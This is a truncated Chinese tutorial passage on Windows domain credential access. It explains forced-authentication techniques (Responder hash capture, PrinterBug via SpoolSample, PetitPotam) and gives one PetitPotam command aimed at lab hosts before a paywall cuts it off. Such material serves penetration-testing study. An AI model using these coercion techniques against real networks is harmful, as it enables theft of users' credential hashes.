域内凭证访问技术全解析
1. 强制认证技术
当用户(如 jon.snow)打开公共共享文件夹时,Responder 可捕获相关信息。为防止前文提及文件类型的强制认证,可通过组策略设置关闭网络文件夹缩略图显示。若之前尝试未成功,下面介绍几种强大的哈希捕获技术。
1.1 常见强制认证方法
| 协议 | 方法 | 说明 |
|---|---|---|
| MS - RPRN | PrinterBug | 这是一个默认在所有 Windows 环境中开启且不会修复的漏洞。攻击者使用域用户名和密码触发 RpcRemoteFindFirstPrinterChangeNotificationEx 方法,通过 SMB 强制认证。常用工具为 SpoolSample,可在 GitHub 找到。 |
| MS - EFSR | PetitPotam | 可通过多个 RPC 调用(如 EfsRpcOpenFileRaw )滥用该协议,迫使 Windows 主机向其他机器进行认证。此 RPC 接口可通过不同 SMB 管道访问。在 castelblack 上运行命令 PetitPotam.exe 192.168.56.100 192.168.56.11 1 ,使用 Responder 捕 |
超级会员免费看
订阅专栏 解锁全文

449

被折叠的 条评论
为什么被折叠?



